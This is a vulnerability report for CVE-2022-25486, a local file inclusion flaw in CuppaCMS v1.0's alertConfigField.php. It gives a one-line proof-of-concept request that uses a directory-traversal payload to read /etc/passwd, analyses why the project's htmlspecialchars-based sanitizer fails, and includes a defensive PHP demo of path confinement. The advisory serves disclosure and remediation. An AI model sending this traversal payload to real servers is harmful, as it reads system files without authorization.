Headline
CVE-2022-25486: Unauthorized local file inclusion (LFI) vulnerability exists via the urlConfig parameter in /alerts/alertConfigField.php · Issue #25 · CuppaCMS/CuppaCMS
CuppaCMS v1.0 contains a local file inclusion (LFI) vulnerability via the urlConfig POST parameter in /alerts/alertConfigField.php: the parameter is concatenated into an include path without any traversal filtering, so an attacker can make the script include arbitrary files from the server's filesystem.
Product version: CuppaCMS v1.0 (http://cuppacms.com/files/cuppa_cms.zip)
poc
POST /alerts/alertConfigField.php
urlConfig=../../../../../../../../../../../../../../etc/passwd
analysis
location: /alerts/alertConfigField.php line 77
<?php include "…/components/table_manager/fields/config/".@$cuppa->POST("urlConfig"); ?>
where $cuppa->POST is defined as:
// post
public function POST($string){
return $this->sanitizeString(@$_POST[$string]);
}
and sanitizeString is:
public function sanitizeString($string){
return htmlspecialchars(trim(@$string));
}
So the only processing applied to urlConfig is trim() and htmlspecialchars(). htmlspecialchars() encodes &, <, >, and quotes, but it leaves ".", "/" and "\" untouched, so a traversal string such as ../../../../etc/passwd reaches include() unchanged. There is no check that the resulting path stays inside the config directory, and no allow-list of permitted file names.
Repair suggestions
Validate urlConfig before using it in include: reject any value that contains path-traversal sequences (for example "..", "/" or "\") and, better, only accept values that match an allow-list of known config file names inside the components/table_manager/fields/config/ directory, resolving the final path with realpath() and confirming it is still inside that directory before including it. Note that htmlspecialchars() is an output-encoding function for HTML and is not a filesystem-path filter; treat it as providing no protection here.
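The following is an added example, not CuppaCMS code, that reproduces the sanitizeString() logic quoted above and contrasts it with a hypothetical path-confinement helper (resolveConfigFile, an assumed name) of the kind the repair suggestion describes. The temporary directory and the default.php file it creates are constructed for the demo only.

```php
<?php
// Added example; not part of CuppaCMS. Shows why trim()+htmlspecialchars()
// does not stop traversal, and one way to confine an include to a directory.

// Same logic as the sanitizer quoted from the project: no path filtering at all.
function sanitizeString($string) {
    return htmlspecialchars(trim(@$string));
}

// Hypothetical hardened resolver (assumed helper, not from the project).
// Assumption: legitimate config files are regular files located directly
// inside $baseDir; anything else is rejected.
function resolveConfigFile(string $baseDir, string $name): ?string {
    // Reject empty names, directory separators, NUL bytes and dot entries.
    if ($name === '' || $name === '.' || $name === '..') {
        return null;
    }
    if (strpbrk($name, "/\\\0") !== false || $name !== basename($name)) {
        return null;
    }
    $realBase  = realpath($baseDir);
    $candidate = realpath($baseDir . DIRECTORY_SEPARATOR . $name);
    if ($realBase === false || $candidate === false) {
        return null;
    }
    // Containment check: the resolved file must sit directly under the base directory.
    if (dirname($candidate) !== $realBase || !is_file($candidate)) {
        return null;
    }
    return $candidate;
}

// Constructed demo environment: a scratch config directory with one legitimate file.
$base = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'cuppa_lfi_demo_' . getmypid();
mkdir($base);
file_put_contents($base . DIRECTORY_SEPARATOR . 'default.php', "<?php\n\$demo = true;\n");

// The traversal payload from the report.
$payload = str_repeat('../', 14) . 'etc/passwd';

// 1. The original sanitizer returns the traversal string unchanged.
var_dump(sanitizeString($payload) === $payload);          // bool(true)

// 2. The hardened resolver rejects the traversal payload...
var_dump(resolveConfigFile($base, $payload));             // NULL

// ...and also rejects a bare separator or a NUL-byte trick.
var_dump(resolveConfigFile($base, 'sub/default.php'));    // NULL
var_dump(resolveConfigFile($base, "default.php\0.txt"));  // NULL

// 3. A legitimate file name in the config directory is accepted.
$ok = resolveConfigFile($base, 'default.php');
var_dump($ok !== null && basename($ok) === 'default.php'); // bool(true)

// Only include after the path has been confined to the expected directory.
if ($ok !== null) {
    include $ok;
}

// Clean up the constructed demo files.
unlink($base . DIRECTORY_SEPARATOR . 'default.php');
rmdir($base);
```

An even stricter design is to never accept a file name from the client at all: take a short key (for example a field type) and map it through a fixed array of known config files on the server side, so no user-controlled string ever reaches include(). Whichever approach is used, also make sure allow_url_include stays disabled in php.ini, otherwise an unfiltered include() can be turned from local to remote file inclusion.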